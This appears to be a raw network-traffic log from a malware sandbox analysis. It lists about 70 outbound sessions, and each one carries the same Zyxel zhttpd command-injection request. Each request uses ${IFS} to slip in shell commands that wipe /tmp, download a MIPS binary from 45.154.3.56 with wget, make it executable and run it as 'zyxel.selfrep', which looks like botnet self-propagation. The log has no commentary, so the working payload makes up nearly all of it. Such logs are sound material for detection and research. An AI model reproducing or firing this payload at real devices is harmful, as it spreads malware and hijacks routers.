                        Mar 12, 2024 08:50:22.996798992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        116192.168.2.1457240150.213.167.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996849060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        117192.168.2.1453444104.102.104.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996968031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        118192.168.2.1451064188.243.24.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997076035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        119192.168.2.1443118216.200.136.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997147083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        120192.168.2.144518045.114.219.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997169018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        121192.168.2.1457826209.157.246.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997286081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        122192.168.2.1439786161.196.130.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997351885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        123192.168.2.1434368187.185.30.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997426033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        124192.168.2.1440812154.216.141.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997476101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        125192.168.2.1460494202.20.135.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997550011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        126192.168.2.1457192198.38.208.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997654915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        127192.168.2.144388274.190.74.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997709990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        128192.168.2.1455682198.79.143.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997777939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        129192.168.2.1440730169.59.77.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997879982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        130192.168.2.143431446.51.205.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.997952938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        131192.168.2.1449468176.203.67.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998014927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        132192.168.2.144387681.240.247.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998107910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        133192.168.2.145700057.151.108.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998198032 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        134192.168.2.144696259.252.147.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998270035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        135192.168.2.1435910170.68.29.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998354912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        136192.168.2.1446592128.23.100.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998435020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        137192.168.2.1447494117.208.48.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998492002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        138192.168.2.1448002177.48.92.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998579025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        139192.168.2.144637019.83.130.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998691082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        140192.168.2.144394694.78.62.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998770952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        141192.168.2.1452610101.25.128.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998871088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        142192.168.2.1446694101.107.186.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.998920918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        143192.168.2.143527446.15.225.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999011040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        144192.168.2.1440322176.200.217.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999093056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        145192.168.2.143299498.164.156.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999142885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        146192.168.2.1433416178.91.114.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999236107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        147192.168.2.144899294.43.190.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999317884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        148192.168.2.1458312223.135.120.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999360085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        149192.168.2.1441216172.208.134.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999439955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        150192.168.2.1435404118.106.243.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999511957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        151192.168.2.1456592175.13.68.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999614000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        152192.168.2.14473982.8.110.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999716997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        153192.168.2.1452622129.19.4.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999747992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        154192.168.2.143328077.36.235.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999804974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        155192.168.2.1434966141.4.214.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999886036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        156192.168.2.1438410189.13.203.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.999989986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        157192.168.2.1436798105.146.94.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.000094891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        158192.168.2.143870665.167.80.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.000155926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        159192.168.2.1432768103.45.186.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003144979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        160192.168.2.1443014211.116.22.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003243923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        161192.168.2.1456882211.45.181.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003423929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        162192.168.2.1458896156.166.254.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003524065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        163192.168.2.1447850193.67.157.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003667116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        164192.168.2.1451160201.182.240.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003732920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        165192.168.2.1451472124.224.173.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003819942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        166192.168.2.14528324.125.18.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.003851891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        167192.168.2.1446710129.185.49.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004060984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        168192.168.2.145386891.25.187.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004162073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        169192.168.2.1442440158.141.225.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004230976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        170192.168.2.144658839.92.0.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004467964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        171192.168.2.145773474.10.28.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004539967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        172192.168.2.1450608121.29.148.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004661083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        173192.168.2.1439392101.186.37.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004781961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        174192.168.2.1446660161.165.34.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004858971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        175192.168.2.144071096.246.141.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.004964113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        176192.168.2.145854278.179.27.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005016088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        177192.168.2.143817852.170.56.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005167007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        178192.168.2.1447902177.201.115.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005249023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        179192.168.2.1456166150.137.230.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005378962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        180192.168.2.1437448122.38.165.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005470991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        181192.168.2.1439076200.58.142.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005562067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        182192.168.2.1442548205.193.51.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005609035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        183192.168.2.1460324109.221.177.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005729914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        184192.168.2.145816641.23.77.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.005862951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        185192.168.2.1436464173.211.21.138443
                        TimestampBytes transferredDirectionData
